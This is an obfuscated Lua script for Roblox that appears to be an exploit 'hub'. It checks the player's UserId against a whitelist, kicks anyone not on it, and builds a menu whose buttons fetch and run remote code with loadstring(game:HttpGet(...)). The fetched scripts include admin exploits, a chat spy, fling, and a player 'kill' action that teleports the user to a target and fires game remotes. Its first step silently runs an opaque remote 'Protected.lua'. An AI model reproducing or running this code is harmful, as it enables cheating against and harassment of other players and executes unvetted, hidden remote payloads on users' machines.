--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v11,v12)local v13={};for v16=1, #v11 do v6(v13,v0(v4(v1(v2(v11,v16,v16 + 1 )),v1(v2(v12,1 + (v16% #v12) ,1 + (v16% #v12) + 1 )))%256 ));end return v5(v13);end local v8={2099490465 -290297751 ,3602779244 -0 ,4659378672 -1168942794 ,5257463884 -0 ,2507123917 -(927 + 959) };local v9=game.Players.LocalPlayer.UserId;local v10=false;for v14,v15 in ipairs(v8) do if (v9==v15) then v10=true;break;end end print(v7("\216\208\250\41\234\180\208\27\213\153","\126\177\163\187\69\134\219\167"),v10);if v10 then local v17=0 -0 ;local v18;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;local v31;local v32;while true do if (v17==(23 -14)) then v31:AddTextbox({[v7("\151\34\166\113","\212\217\67\203\20\223\223\37")]=v7("\148\140\165\215\250\164\165\194\175\153","\178\218\237\200"),[v7("\146\176\224\209\163\185\242","\176\214\213\134")]=v7("\224\180\166\209\232\88\88\249\168\246\220\173\68\92","\57\148\205\214\180\200\54"),[v7("\38\248\45\32\82\27\238\52\36\102\23\252\39","\22\114\157\85\84")]=false,[v7("\231\202\31\200\95\247\171\207","\200\164\171\115\164\61\150")]=function(v38)roleplayName=v38;end});v31:AddButton({[v7("\144\245\14\64","\227\222\148\99\37")]=v7("\18\66\66\250\224\115\124\83\251\252","\153\83\50\50\150"),[v7("\126\119\127\16\113\170\78\86","\45\61\22\19\124\19\203")]=function()local v39=1227 -(322 + 905) ;local v40;while true do if (v39==(612 -(602 + 9))) then game:GetService(v7("\32\37\40\112\181\119\19\52\61\120\143\96\29\50\57\123\185","\20\114\64\88\28\220")):WaitForChild(v7("\20\23\215\186\236\195","\221\81\97\178\212\152\176")):WaitForChild(v7("\195\230\16\254\63\219\226\19\239","\122\173\135\125\155")):FireServer(unpack(v40));break;end if (v39==(1189 -(449 + 740))) then if (string.len(roleplayName)>(972 -(826 + 46))) then roleplayName=string.sub(roleplayName,948 -(245 + 702) ,315 -215 );end v40={[286 -(175 + 110) ]=roleplayName,[1 + 1 ]=v7("\209\30\12\236\7\98","\217\161\114\109\149\98\16")};v39=1899 -(260 + 1638) ;end end end});v32=v19:MakeTab({[v7("\170\192\13\188","\168\228\161\96\217\95\81")]="Credits / help",[v7("\242\210\33\82","\55\187\177\78\60\79")]="rbxassetid://123456789",[v7("\29\220\90\230\79\218\141\2\192\83\242","\224\77\174\63\139\38\175")]=false});v32:AddParagraph(v7("\183\66\74\39\148\85\24\42\129\87\93\34\139\81\93\60","\78\228\33\56"),v7("\226\113\161\23","\229\174\30\210\99"));v17=450 -(382 + 58) ;end if (v17==(6 -4)) then local v33=0 + 0 ;while true do if (v33==(3 -1)) then v17=8 -5 ;break;end if (v33==(1 + 0)) then v22();v20:AddParagraph("⚠️ Important ⚠️","The chat spy in the other tab does get private messages just doesn't change the color");v33=1207 -(902 + 303) ;end if (v33==(0 + 0)) then v22=nil;function v22()local v53=0 -0 ;local v54;local v55;while true do if (v53==1) then while true do if (v54==1) then v21:Refresh(v55,true);break;end if (v54==(0 -0)) then v55={};for v60,v61 in pairs(game.Workspace.Teams:GetChildren()) do table.insert(v55,v61.Name);end v54=1 + 0 ;end end break;end if (v53==(0 + 0)) then v54=1690 -(1121 + 569) ;v55=nil;v53=215 -(22 + 192) ;end end end v33=684 -(483 + 200) ;end end end if (v17==(1473 -(1404 + 59))) then v32:AddParagraph(v7("\41\226\132\93\226\37\121\46\254\131\67","\89\123\141\230\49\141\93"),v7("\218\101\229\6\5\89\231\124\243\10\2\67\246\127\242\0\9\27","\42\147\17\150\108\112"));v32:AddParagraph(v7("\41\169\63\63\207\237\3\182","\136\111\198\77\31\135"),v7("\35\26\172\22\176\235\19\172\16\8\179\95\178\234\87\160\12\73\163\95\174\231\24\187\6\73\180\83\175\242\18\187","\201\98\105\199\54\221\132\119"));while true do local v41=0 -0 ;while true do if (v41==(0 -0)) then wait(766 -(468 + 297) );v22();break;end end end break;end if (v17==(567 -(334 + 228))) then local v34=0 -0 ;while true do if (v34==(2 -1)) then v28="";v26:AddDropdown({[v7("\47\230\69\90","\19\97\135\40\63")]=v7("\158\80\50\34\42\35\138\78\60\43\43\62\185\82","\81\206\60\83\91\79"),[v7("\106\174\214\115\58\207\89","\196\46\203\176\18\79\163\45")]="",[v7("\151\50\106\23\43\245\252","\143\216\66\30\126\68\155")]=v27,[v7("\137\201\1\199\199\162\212\234","\129\202\168\109\171\165\195\183")]=function(v56)local v57=0 -0 ;while true do if (v57==(0 + 0)) then v28=v56;print(v7("\17\93\59\221\221\0\227\38\24\39\212\223\13\227\48\2","\134\66\56\87\184\190\116"),v28);break;end end end});v34=1 + 1 ;end if (v34==(6 -4)) then v17=6;break;end if (v34==(1739 -(404 + 1335))) then v27={};for v58,v59 in ipairs(game.Players:GetPlayers()) do table.insert(v27,v59.Name);end v34=237 -(141 + 95) ;end end end if (v17==(8 + 0)) then local v35=0 -0 ;while true do if (v35==(2 -1)) then v30:AddButton({[v7("\236\128\27\251","\56\162\225\118\158\89\142")]=v7("\114\10\212\167\43\214\91","\184\60\101\160\207\66"),[v7("\18\131\112\176\51\131\127\183","\220\81\226\28")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/toldblock/GelatekHub/main/Main.lua"))();end});v31=v19:MakeTab({[v7("\61\212\143\254","\167\115\181\226\155\138")]=v7("\240\45\235\89\107\125\199\251\98\233\93\118\116","\166\130\66\135\60\27\17"),[v7("\109\73\193\123","\80\36\42\174\21")]="rbxassetid://123456789",[v7("\126\2\50\119\71\5\58\85\64\28\46","\26\46\112\87")]=false});v35=4 -2 ;end if (v35==(0 + 0)) then v30=v19:MakeTab({[v7("\171\179\62\14","\233\229\210\83\107\40\46")]="Admin / Hubs",[v7("\232\65\61\216","\101\161\34\82\182")]="rbxassetid://123456789",[v7("\216\31\92\243\210\247\143\1\230\1\64","\78\136\109\57\158\187\130\226")]=false});v30:AddButton({[v7("\16\62\244\244","\145\94\95\153")]=v7("\212\195\18\220\64\190\233\200\84\204\75\190\241\201","\215\157\173\116\181\46"),[v7("\22\181\135\254\216\52\183\128","\186\85\212\235\146")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))();end});v35=2 -1 ;end if (v35==(2 + 0)) then v17=5 + 4 ;break;end end end if (v17==(3 + 4)) then local v36=0 -0 ;while true do if (v36==(1 + 0)) then v29:AddButton({[v7("\217\242\49\215","\178\151\147\92")]=v7("\162\242\88\58\27\66\125","\26\236\157\44\82\114\44"),[v7("\9\47\217\87\40\47\214\80","\59\74\78\181")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/lostbunny489/RobloxUsers/main/Players.txt"))();end});v29:AddButton({[v7("\11\208\87\95","\211\69\177\58\58")]=v7("\180\237\120\225\250\219\174","\171\215\133\25\149\137"),[v7("\194\201\62\246\237\49\255\73","\34\129\168\82\154\143\80\156")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/amagineLost/Jsjsbs/main/Chatspy",true))();end});v36=8 -6 ;end if (v36==0) then v29:AddButton({[v7("\139\171\46\27","\49\197\202\67\126\115\100\167")]=v7("\4\94\222\59\131\94\30\16\78\214","\62\87\59\191\73\224\54"),[v7("\196\3\246\197\229\3\249\194","\169\135\98\154")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/lostbunny489/search-/main/Code"))();end});v29:AddButton({[v7("\229\118\41\81","\168\171\23\68\52\157\83")]=v7("\218\126\225\165\44\35\128","\231\148\17\149\205\69\77"),[v7("\163\166\203\247\85\254\131\172","\159\224\199\167\155\55")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/lostbunny489/fling/main/Code"))();end});v36=1 + 0 ;end if (v36==(165 -(92 + 71))) then v17=1501 -(711 + 782) ;break;end end end if (v17==(3 + 3)) then v26:AddButton({[v7("\18\48\4\190","\85\92\81\105\219\121\139\65")]=v7("\206\186\68","\191\157\211\48\37\28"),[v7("\252\30\248\16\56\222\28\255","\90\191\127\148\124")]=function()local v42=game.Players.LocalPlayer;local v43=v42.Character;local v44=v28;local v45=game.Players:FindFirstChild(v44);if v45 then local v49=0 -0 ;local v50;local v51;local v52;while true do if (v49==0) then v50=0 + 0 ;v51=nil;v49=1820 -(580 + 1239) ;end if (v49==(2 -1)) then v52=nil;while true do if (v50==(765 -(574 + 191))) then v43:SetPrimaryPartCFrame(v45.Character.PrimaryPart.CFrame);wait(1 + 0 );v50=1 + 0 ;end if (v50==(4 -2)) then v52:FireServer(unpack(v51));break;end if (v50==1) then v51={[1 + 0 ]=v44,[2 + 0 ]=v7("\123\134\60\5\97","\119\24\231\78")};v52=game:GetService(v7("\176\40\181\70\213\67\16\150\40\161\121\200\79\3\131\42\160","\113\226\77\197\42\188\32")):WaitForChild(v7("\8\31\240\176\31\0\241\187\46\5","\213\90\118\148")):WaitForChild(v7("\90\45\183\83\93\79\11\162\83\67\79","\45\59\78\212\54"));v50=851 -(254 + 595) ;end end break;end end else print(v7("\51\89\150\135\130\110\163\255\4\22\133\130\136\42\237\224\28\87\154\142\148\110\186\249\4\94\195\158\149\43\191\254\17\91\134\209\198","\144\112\54\227\235\230\78\205")   .. v44 );end end});v29=v19:MakeTab({[v7("\157\41\2\249","\59\211\72\111\156\176")]=v7("\97\147\235\40\92","\77\46\231\131"),[v7("\147\87\185\78","\32\218\52\214")]="rbxassetid://123456789",[v7("\126\5\52\165\248\165\72\117\64\27\40","\58\46\119\81\200\145\208\37")]=false});v29:AddButton({[v7("\5\141\61\169","\86\75\236\80\204\201\221")]=v7("\84\77\118\150\246\169\115\66\124","\235\18\33\23\229\158"),[v7("\115\187\205\183\82\187\194\176","\219\48\218\161")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe./main/L"))();end});v29:AddButton({[v7("\202\112\113\76","\128\132\17\28\41\187\47")]=v7("\47\61\18\50\84\15\53","\61\97\82\102\90"),[v7("\143\47\167\71\197\86\29\2","\105\204\78\203\43\167\55\126")]=function()loadstring(game:HttpGet("https://gist.githubusercontent.com/1BlueCat/544f7efbe88235666b5b7add65b7344d/raw/f20804bb85542dcc3bc938982e1f05b7ff05cded/FE%2520Hat"))();end});v17=133 -(55 + 71) ;end if (v17==1) then v20:AddParagraph(v7("\237\51\53\166\243\165\201\53\43\227\158\235","\202\171\92\71\134\190"),v7("\29\201\37\155\105\206\60\141\39\210\108\137\105\202\41\145\43\192\35\154\45\129\56\135\105\201\37\140\44\129\45\134\45\129\57\134\33\200\40\141\105\213\36\141\105\198\57\129","\232\73\161\76"));v20:AddButton({[v7("\149\216\79\88","\126\219\185\34\61")]=v7("\7\203\71\112\127\120\225\227","\135\108\174\62\18\30\23\147"),[v7("\149\232\38\199\26\175\48\204","\167\214\137\74\171\120\206\83")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt",true))();end});v20:AddParagraph(v7("\161\255\59\83\184\134\133\233\114\105\253\166\134","\199\235\144\82\61\152"),v7("\23\4\188\56\20\86\173\46\6\27\249\37\6\27\188\107\1\4\182\38\71\18\171\36\23\86\189\36\16\24\249\63\8\86\179\36\14\24","\75\103\118\217"));v21=v20:AddDropdown({[v7("\233\85\125\17","\126\167\52\16\116\217")]=v7("\252\43\33\141","\156\168\78\64\224\212\121"),[v7("\35\235\163\207\18\226\177","\174\103\142\197")]=v7("\101\45\83\61\38\74\184\87\104\75\61\36\83","\152\54\72\63\88\69\62"),[v7("\251\212\250\85\219\202\253","\60\180\164\142")]={},[v7("\123\95\9\37\37\236\17\83","\114\56\62\101\73\71\141")]=function(v46)for v47,v48 in pairs(game.Workspace.Teams:GetChildren()) do if (v48.Name==v46) then game:GetService(v7("\138\236\203\200\177\234\218\208\189\237\232\208\183\251\218\195\189","\164\216\137\187")).acceptedEvent:FireServer(v46);break;end end end});v17=2 -0 ;end if (v17==(1794 -(573 + 1217))) then v23:AddButton({[v7("\144\243\204\199","\30\222\146\161\162\90\174\210")]=v7("\201\75\102\15\233\14\68\24\228\77\123\15\247\14\75\74\230\91\98\24\224\64\100\6\252\14\127\12\227\66\121\4\224\14\77","\106\133\46\16"),[v7("\123\33\127\240\88\65\91\43","\32\56\64\19\156\58")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/amagineLost/level-tracker-/main/Protected.lua%20(12).txt"))();end});v24=game:GetService(v7("\106\196\228\79\95\224\147","\224\58\168\133\54\58\146"));v25=game:GetService(v7("\107\83\91\241\124\133\134\31\92\82\120\233\122\148\134\12\92","\107\57\54\43\157\21\230\231"));v26=v19:MakeTab({[v7("\245\138\28\240","\175\187\235\113\149\217\188")]=v7("\15\166\149\12\236\119\56\61\161\152\12\243\117\121\37\170\147","\24\92\207\225\44\131\25"),[v7("\98\208\183\66","\29\43\179\216\44\123")]="rbxassetid://123456789",[v7("\141\203\37\65\180\204\45\99\179\213\57","\44\221\185\64")]=false});v17=13 -8 ;end if (v17==(0 + 0)) then loadstring(game:HttpGet("https://raw.githubusercontent.com/amagineLost/Swnt/main/Protected.lua%20(11).txt"))();v18=loadstring(game:HttpGet("https://raw.githubusercontent.com/shlexware/Orion/main/source"))();v19=v18:MakeWindow({[v7("\13\204\39\192","\156\67\173\74\165")]=v7("\16\152\122\86\144\47\68\38\182\91\15","\38\84\215\41\118\220\70"),[v7("\120\31\38\23\206\66\19\47\27\235\93","\158\48\118\66\114")]=false,[v7("\152\37\6\51\80\170\245\173\45\23","\155\203\68\112\86\19\197")]=true,[v7("\101\210\56\250\73\127\195\247\74\217\51\238","\152\38\189\86\156\32\24\133")]=v7("\209\78\132\73\242\81\174\65\218\88\171\66\249\69","\38\156\55\199"),[v7("\129\115\104\58\28\81\244\66\170\113\121\44","\35\200\29\28\72\115\20\154")]=false,[v7("\48\188\222\209","\84\121\223\177\191\237\76")]="https://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&userid=1"});v20=v19:MakeTab({[v7("\149\87\196\165","\161\219\54\169\192\90\48\80")]=v7("\96\76\6\42\91\79\1\49\64\77\14","\69\41\34\96"),[v7("\149\192\216\4","\75\220\163\183\106\98")]="rbxassetid://123456789",[v7("\50\168\142\58\208\23\183\164\57\213\27","\185\98\218\235\87")]=false});v17=1 -0 ;end if (v17==(942 -(714 + 225))) then local v37=0 -0 ;while true do if (v37==(5 -3)) then v17=9 -5 ;break;end if ((1 -0)==v37) then v23:AddButton({[v7("\11\133\178\73","\112\69\228\223\44\100\232\113")]=v7("\247\13\8\196\246\84\147\214","\230\180\127\103\179\214\28"),[v7("\175\4\83\74\230\64\227\135","\128\236\101\63\38\132\33")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/CrowzScripts/AnimalSim/main/CrowOnTop"))();end});v23:AddButton({[v7("\130\168\28\65","\175\204\201\113\36\214\139")]=v7("\117\197\37\156\44\82\206","\100\39\172\85\188"),[v7("\142\121\181\140\49\172\123\178","\83\205\24\217\224")]=function()_G.RedGUI=true;_G.Theme=v7("\194\196\223\54","\93\134\165\173");loadstring(game:HttpGet("https://raw.githubusercontent.com/CasperFlyModz/discord.gg-rips/main/AnimalSimulator.lua"))();end});v37=507 -(351 + 154) ;end if (v37==(1574 -(1281 + 293))) then v23=v19:MakeTab({[v7("\252\231\60\183","\107\178\134\81\210\198\158")]=v7("\57\27\150\201\172\57\28\143","\202\88\110\226\166"),[v7("\234\12\141\249","\170\163\111\226\151")]="rbxassetid://123456789",[v7("\33\34\183\53\71\34\36\62\62\190\33","\73\113\80\210\88\46\87")]=false});v23:AddButton({[v7("\175\45\192\23","\135\225\76\173\114")]=v7("\53\227\177\240\132\168\165","\199\122\141\216\208\204\221"),[v7("\142\220\28\252\122\247\174\214","\150\205\189\112\144\24")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/lostbunny489/exposed/main/Untitled.112.txt"))();end});v37=1;end end end end else game:GetService(v7("\137\0\130\56\7\39\191","\204\217\108\227\65\98\85")).LocalPlayer:Kick(v7("\122\204\181\235\35\212\30\194\246\230\41\211\77\131\225\234\108\238\120\131\198\230\62\201\78\215\230","\160\62\163\149\133\76"));end